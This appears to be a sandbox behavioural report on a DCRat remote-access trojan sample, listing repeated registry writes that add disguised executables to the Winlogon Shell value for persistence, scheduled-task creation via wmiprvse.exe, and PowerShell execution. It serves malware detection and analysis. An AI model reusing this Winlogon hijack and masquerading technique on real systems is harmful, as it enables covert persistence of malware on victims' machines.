Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\DriversavessessionDlldhcp\\lsass.exe\", \"C:\\Program Files\\MSBuild\\Microsoft\\Windows Workflow Foundation\\v3.0\\conhost.exe\", \"C:\\MSOCache\\All Users\\{90140000-0116-0409-1000-0000000FF1CE}-C\\audiodg.exe\", \"C:\\Windows\\Offline Web Pages\\Refcrt.exe\", \"C:\\Program Files\\Microsoft Office\\Office14\\1033\\dllhost.exe\"" C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\DriversavessessionDlldhcp\\lsass.exe\", \"C:\\Program Files\\MSBuild\\Microsoft\\Windows Workflow Foundation\\v3.0\\conhost.exe\", \"C:\\MSOCache\\All Users\\{90140000-0116-0409-1000-0000000FF1CE}-C\\audiodg.exe\", \"C:\\Windows\\Offline Web Pages\\Refcrt.exe\", \"C:\\Program Files\\Microsoft Office\\Office14\\1033\\dllhost.exe\", \"C:\\winNet\\Bloxstrap.exe\", \"C:\\Users\\All Users\\audiodg.exe\", \"C:\\winNet\\lsm.exe\", \"C:\\Recovery\\2b7a8ca2-3d6d-11ef-81ce-f2a3cf4ad94f\\lsass.exe\", \"C:\\winNet\\wscript.exe\", \"C:\\Recovery\\2b7a8ca2-3d6d-11ef-81ce-f2a3cf4ad94f\\dllhost.exe\", \"C:\\DriversavessessionDlldhcp\\csrss.exe\", \"C:\\Windows\\de-DE\\WmiPrvSE.exe\", \"C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\services.exe\"" C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\DriversavessessionDlldhcp\\lsass.exe\", \"C:\\Program Files\\MSBuild\\Microsoft\\Windows Workflow Foundation\\v3.0\\conhost.exe\", \"C:\\MSOCache\\All Users\\{90140000-0116-0409-1000-0000000FF1CE}-C\\audiodg.exe\", \"C:\\Windows\\Offline Web Pages\\Refcrt.exe\", \"C:\\Program Files\\Microsoft Office\\Office14\\1033\\dllhost.exe\", \"C:\\winNet\\Bloxstrap.exe\", \"C:\\Users\\All Users\\audiodg.exe\", \"C:\\winNet\\lsm.exe\", \"C:\\Recovery\\2b7a8ca2-3d6d-11ef-81ce-f2a3cf4ad94f\\lsass.exe\", \"C:\\winNet\\wscript.exe\", \"C:\\Recovery\\2b7a8ca2-3d6d-11ef-81ce-f2a3cf4ad94f\\dllhost.exe\", \"C:\\DriversavessessionDlldhcp\\csrss.exe\", \"C:\\Windows\\de-DE\\WmiPrvSE.exe\", \"C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\services.exe\", \"C:\\Windows\\Downloaded Program Files\\explorer.exe\", \"C:\\winNet\\lsass.exe\", \"C:\\Windows\\Offline Web Pages\\csrss.exe\", \"C:\\MSOCache\\All Users\\{90140000-0011-0000-0000-0000000FF1CE}-C\\dllhost.exe\", \"C:\\MSOCache\\All Users\\{90140000-001A-0409-0000-0000000FF1CE}-C\\WmiPrvSE.exe\"" C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\DriversavessessionDlldhcp\\lsass.exe\", \"C:\\Program Files\\MSBuild\\Microsoft\\Windows Workflow Foundation\\v3.0\\conhost.exe\"" C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\DriversavessessionDlldhcp\\lsass.exe\", \"C:\\Program Files\\MSBuild\\Microsoft\\Windows Workflow Foundation\\v3.0\\conhost.exe\", \"C:\\MSOCache\\All Users\\{90140000-0116-0409-1000-0000000FF1CE}-C\\audiodg.exe\", \"C:\\Windows\\Offline Web Pages\\Refcrt.exe\", \"C:\\Program Files\\Microsoft Office\\Office14\\1033\\dllhost.exe\", \"C:\\winNet\\Bloxstrap.exe\", \"C:\\Users\\All Users\\audiodg.exe\", \"C:\\winNet\\lsm.exe\", \"C:\\Recovery\\2b7a8ca2-3d6d-11ef-81ce-f2a3cf4ad94f\\lsass.exe\", \"C:\\winNet\\wscript.exe\", \"C:\\Recovery\\2b7a8ca2-3d6d-11ef-81ce-f2a3cf4ad94f\\dllhost.exe\", \"C:\\DriversavessessionDlldhcp\\csrss.exe\", \"C:\\Windows\\de-DE\\WmiPrvSE.exe\", \"C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\services.exe\", \"C:\\Windows\\Downloaded Program Files\\explorer.exe\", \"C:\\winNet\\lsass.exe\", \"C:\\Windows\\Offline Web Pages\\csrss.exe\", \"C:\\MSOCache\\All Users\\{90140000-0011-0000-0000-0000000FF1CE}-C\\dllhost.exe\", \"C:\\MSOCache\\All Users\\{90140000-001A-0409-0000-0000000FF1CE}-C\\WmiPrvSE.exe\", \"C:\\Users\\Admin\\Documents\\My Videos\\csrss.exe\"" C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\DriversavessessionDlldhcp\\lsass.exe\", \"C:\\Program Files\\MSBuild\\Microsoft\\Windows Workflow Foundation\\v3.0\\conhost.exe\", \"C:\\MSOCache\\All Users\\{90140000-0116-0409-1000-0000000FF1CE}-C\\audiodg.exe\", \"C:\\Windows\\Offline Web Pages\\Refcrt.exe\", \"C:\\Program Files\\Microsoft Office\\Office14\\1033\\dllhost.exe\", \"C:\\winNet\\Bloxstrap.exe\", \"C:\\Users\\All Users\\audiodg.exe\", \"C:\\winNet\\lsm.exe\", \"C:\\Recovery\\2b7a8ca2-3d6d-11ef-81ce-f2a3cf4ad94f\\lsass.exe\", \"C:\\winNet\\wscript.exe\", \"C:\\Recovery\\2b7a8ca2-3d6d-11ef-81ce-f2a3cf4ad94f\\dllhost.exe\", \"C:\\DriversavessessionDlldhcp\\csrss.exe\", \"C:\\Windows\\de-DE\\WmiPrvSE.exe\", \"C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\services.exe\", \"C:\\Windows\\Downloaded Program Files\\explorer.exe\", \"C:\\winNet\\lsass.exe\", \"C:\\Windows\\Offline Web Pages\\csrss.exe\", \"C:\\MSOCache\\All Users\\{90140000-0011-0000-0000-0000000FF1CE}-C\\dllhost.exe\", \"C:\\MSOCache\\All Users\\{90140000-001A-0409-0000-0000000FF1CE}-C\\WmiPrvSE.exe\", \"C:\\Users\\Admin\\Documents\\My Videos\\csrss.exe\", \"C:\\Users\\All Users\\Microsoft\\eHome\\wininit.exe\", \"C:\\Program Files\\Windows Journal\\fr-FR\\conhost.exe\", \"C:\\MSOCache\\All Users\\msiexec.exe\", \"C:\\DriversavessessionDlldhcp\\dwm.exe\", \"C:\\winNet\\sddsfsdf.exe\", \"C:\\Users\\Admin\\AppData\\Local\\csrss.exe\", \"C:\\DriversavessessionDlldhcp\\Roblox.exe\", \"C:\\Program Files (x86)\\Common Files\\DESIGNER\\taskhost.exe\", \"C:\\Users\\Default User\\dllhost.exe\", \"C:\\Windows\\BitLockerDiscoveryVolumeContents\\msiexec.exe\", \"C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\Packages\\Debugger\\conhost.exe\"" C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\DriversavessessionDlldhcp\\lsass.exe\", \"C:\\Program Files\\MSBuild\\Microsoft\\Windows Workflow Foundation\\v3.0\\conhost.exe\", \"C:\\MSOCache\\All Users\\{90140000-0116-0409-1000-0000000FF1CE}-C\\audiodg.exe\", \"C:\\Windows\\Offline Web Pages\\Refcrt.exe\", \"C:\\Program Files\\Microsoft Office\\Office14\\1033\\dllhost.exe\", \"C:\\winNet\\Bloxstrap.exe\", \"C:\\Users\\All Users\\audiodg.exe\", \"C:\\winNet\\lsm.exe\", \"C:\\Recovery\\2b7a8ca2-3d6d-11ef-81ce-f2a3cf4ad94f\\lsass.exe\", \"C:\\winNet\\wscript.exe\", \"C:\\Recovery\\2b7a8ca2-3d6d-11ef-81ce-f2a3cf4ad94f\\dllhost.exe\", \"C:\\DriversavessessionDlldhcp\\csrss.exe\", \"C:\\Windows\\de-DE\\WmiPrvSE.exe\", \"C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\services.exe\", \"C:\\Windows\\Downloaded Program Files\\explorer.exe\", \"C:\\winNet\\lsass.exe\", \"C:\\Windows\\Offline Web Pages\\csrss.exe\", \"C:\\MSOCache\\All Users\\{90140000-0011-0000-0000-0000000FF1CE}-C\\dllhost.exe\", \"C:\\MSOCache\\All Users\\{90140000-001A-0409-0000-0000000FF1CE}-C\\WmiPrvSE.exe\", \"C:\\Users\\Admin\\Documents\\My Videos\\csrss.exe\", \"C:\\Users\\All Users\\Microsoft\\eHome\\wininit.exe\", \"C:\\Program Files\\Windows Journal\\fr-FR\\conhost.exe\", \"C:\\MSOCache\\All Users\\msiexec.exe\", \"C:\\DriversavessessionDlldhcp\\dwm.exe\", \"C:\\winNet\\sddsfsdf.exe\", \"C:\\Users\\Admin\\AppData\\Local\\csrss.exe\"" C:\DriversavessessionDlldhcp\Roblox.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\DriversavessessionDlldhcp\\lsass.exe\", \"C:\\Program Files\\MSBuild\\Microsoft\\Windows Workflow Foundation\\v3.0\\conhost.exe\", \"C:\\MSOCache\\All Users\\{90140000-0116-0409-1000-0000000FF1CE}-C\\audiodg.exe\", \"C:\\Windows\\Offline Web Pages\\Refcrt.exe\", \"C:\\Program Files\\Microsoft Office\\Office14\\1033\\dllhost.exe\", \"C:\\winNet\\Bloxstrap.exe\", \"C:\\Users\\All Users\\audiodg.exe\", \"C:\\winNet\\lsm.exe\", \"C:\\Recovery\\2b7a8ca2-3d6d-11ef-81ce-f2a3cf4ad94f\\lsass.exe\", \"C:\\winNet\\wscript.exe\", \"C:\\Recovery\\2b7a8ca2-3d6d-11ef-81ce-f2a3cf4ad94f\\dllhost.exe\", \"C:\\DriversavessessionDlldhcp\\csrss.exe\", \"C:\\Windows\\de-DE\\WmiPrvSE.exe\", \"C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\services.exe\", \"C:\\Windows\\Downloaded Program Files\\explorer.exe\", \"C:\\winNet\\lsass.exe\", \"C:\\Windows\\Offline Web Pages\\csrss.exe\", \"C:\\MSOCache\\All Users\\{90140000-0011-0000-0000-0000000FF1CE}-C\\dllhost.exe\", \"C:\\MSOCache\\All Users\\{90140000-001A-0409-0000-0000000FF1CE}-C\\WmiPrvSE.exe\", \"C:\\Users\\Admin\\Documents\\My Videos\\csrss.exe\", \"C:\\Users\\All Users\\Microsoft\\eHome\\wininit.exe\", \"C:\\Program Files\\Windows Journal\\fr-FR\\conhost.exe\", \"C:\\MSOCache\\All Users\\msiexec.exe\", \"C:\\DriversavessessionDlldhcp\\dwm.exe\", \"C:\\winNet\\sddsfsdf.exe\", \"C:\\Users\\Admin\\AppData\\Local\\csrss.exe\", \"C:\\DriversavessessionDlldhcp\\Roblox.exe\"" C:\DriversavessessionDlldhcp\Roblox.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\DriversavessessionDlldhcp\\lsass.exe\", \"C:\\Program Files\\MSBuild\\Microsoft\\Windows Workflow Foundation\\v3.0\\conhost.exe\", \"C:\\MSOCache\\All Users\\{90140000-0116-0409-1000-0000000FF1CE}-C\\audiodg.exe\", \"C:\\Windows\\Offline Web Pages\\Refcrt.exe\", \"C:\\Program Files\\Microsoft Office\\Office14\\1033\\dllhost.exe\", \"C:\\winNet\\Bloxstrap.exe\", \"C:\\Users\\All Users\\audiodg.exe\", \"C:\\winNet\\lsm.exe\", \"C:\\Recovery\\2b7a8ca2-3d6d-11ef-81ce-f2a3cf4ad94f\\lsass.exe\", \"C:\\winNet\\wscript.exe\", \"C:\\Recovery\\2b7a8ca2-3d6d-11ef-81ce-f2a3cf4ad94f\\dllhost.exe\", \"C:\\DriversavessessionDlldhcp\\csrss.exe\", \"C:\\Windows\\de-DE\\WmiPrvSE.exe\", \"C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\services.exe\", \"C:\\Windows\\Downloaded Program Files\\explorer.exe\", \"C:\\winNet\\lsass.exe\", \"C:\\Windows\\Offline Web Pages\\csrss.exe\", \"C:\\MSOCache\\All Users\\{90140000-0011-0000-0000-0000000FF1CE}-C\\dllhost.exe\", \"C:\\MSOCache\\All Users\\{90140000-001A-0409-0000-0000000FF1CE}-C\\WmiPrvSE.exe\", \"C:\\Users\\Admin\\Documents\\My Videos\\csrss.exe\", \"C:\\Users\\All Users\\Microsoft\\eHome\\wininit.exe\", \"C:\\Program Files\\Windows Journal\\fr-FR\\conhost.exe\", \"C:\\MSOCache\\All Users\\msiexec.exe\", \"C:\\DriversavessessionDlldhcp\\dwm.exe\", \"C:\\winNet\\sddsfsdf.exe\", \"C:\\Users\\Admin\\AppData\\Local\\csrss.exe\", \"C:\\DriversavessessionDlldhcp\\Roblox.exe\", \"C:\\Program Files (x86)\\Common Files\\DESIGNER\\taskhost.exe\", \"C:\\Users\\Default User\\dllhost.exe\", \"C:\\Windows\\BitLockerDiscoveryVolumeContents\\msiexec.exe\", \"C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\Packages\\Debugger\\conhost.exe\", \"C:\\MSOCache\\All Users\\{90140000-0019-0409-0000-0000000FF1CE}-C\\WmiPrvSE.exe\", \"C:\\winNet\\spoolsv.exe\", \"C:\\Users\\Default\\conhost.exe\", \"C:\\Program Files\\Windows Defender\\es-ES\\cmd.exe\", \"C:\\MSOCache\\All Users\\{90140000-00A1-0409-0000-0000000FF1CE}-C\\conhost.exe\", \"C:\\Users\\Admin\\WmiPrvSE.exe\", \"C:\\Users\\Public\\Pictures\\sddsfsdf.exe\"" C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\DriversavessessionDlldhcp\\lsass.exe\", \"C:\\Program Files\\MSBuild\\Microsoft\\Windows Workflow Foundation\\v3.0\\conhost.exe\", \"C:\\MSOCache\\All Users\\{90140000-0116-0409-1000-0000000FF1CE}-C\\audiodg.exe\", \"C:\\Windows\\Offline Web Pages\\Refcrt.exe\", \"C:\\Program Files\\Microsoft Office\\Office14\\1033\\dllhost.exe\", \"C:\\winNet\\Bloxstrap.exe\", \"C:\\Users\\All Users\\audiodg.exe\", \"C:\\winNet\\lsm.exe\", \"C:\\Recovery\\2b7a8ca2-3d6d-11ef-81ce-f2a3cf4ad94f\\lsass.exe\", \"C:\\winNet\\wscript.exe\", \"C:\\Recovery\\2b7a8ca2-3d6d-11ef-81ce-f2a3cf4ad94f\\dllhost.exe\", \"C:\\DriversavessessionDlldhcp\\csrss.exe\", \"C:\\Windows\\de-DE\\WmiPrvSE.exe\"" C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\DriversavessessionDlldhcp\\lsass.exe\", \"C:\\Program Files\\MSBuild\\Microsoft\\Windows Workflow Foundation\\v3.0\\conhost.exe\", \"C:\\MSOCache\\All Users\\{90140000-0116-0409-1000-0000000FF1CE}-C\\audiodg.exe\", \"C:\\Windows\\Offline Web Pages\\Refcrt.exe\", \"C:\\Program Files\\Microsoft Office\\Office14\\1033\\dllhost.exe\", \"C:\\winNet\\Bloxstrap.exe\", \"C:\\Users\\All Users\\audiodg.exe\", \"C:\\winNet\\lsm.exe\", \"C:\\Recovery\\2b7a8ca2-3d6d-11ef-81ce-f2a3cf4ad94f\\lsass.exe\", \"C:\\winNet\\wscript.exe\", \"C:\\Recovery\\2b7a8ca2-3d6d-11ef-81ce-f2a3cf4ad94f\\dllhost.exe\", \"C:\\DriversavessessionDlldhcp\\csrss.exe\", \"C:\\Windows\\de-DE\\WmiPrvSE.exe\", \"C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\services.exe\", \"C:\\Windows\\Downloaded Program Files\\explorer.exe\"" C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\DriversavessessionDlldhcp\\lsass.exe\", \"C:\\Program Files\\MSBuild\\Microsoft\\Windows Workflow Foundation\\v3.0\\conhost.exe\", \"C:\\MSOCache\\All Users\\{90140000-0116-0409-1000-0000000FF1CE}-C\\audiodg.exe\", \"C:\\Windows\\Offline Web Pages\\Refcrt.exe\", \"C:\\Program Files\\Microsoft Office\\Office14\\1033\\dllhost.exe\", \"C:\\winNet\\Bloxstrap.exe\", \"C:\\Users\\All Users\\audiodg.exe\", \"C:\\winNet\\lsm.exe\", \"C:\\Recovery\\2b7a8ca2-3d6d-11ef-81ce-f2a3cf4ad94f\\lsass.exe\", \"C:\\winNet\\wscript.exe\", \"C:\\Recovery\\2b7a8ca2-3d6d-11ef-81ce-f2a3cf4ad94f\\dllhost.exe\", \"C:\\DriversavessessionDlldhcp\\csrss.exe\", \"C:\\Windows\\de-DE\\WmiPrvSE.exe\", \"C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\services.exe\", \"C:\\Windows\\Downloaded Program Files\\explorer.exe\", \"C:\\winNet\\lsass.exe\", \"C:\\Windows\\Offline Web Pages\\csrss.exe\", \"C:\\MSOCache\\All Users\\{90140000-0011-0000-0000-0000000FF1CE}-C\\dllhost.exe\", \"C:\\MSOCache\\All Users\\{90140000-001A-0409-0000-0000000FF1CE}-C\\WmiPrvSE.exe\", \"C:\\Users\\Admin\\Documents\\My Videos\\csrss.exe\", \"C:\\Users\\All Users\\Microsoft\\eHome\\wininit.exe\"" C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe N/A

Process spawned unexpected child process

Description Indicator Process Target
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe

DCRat payload

rat
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
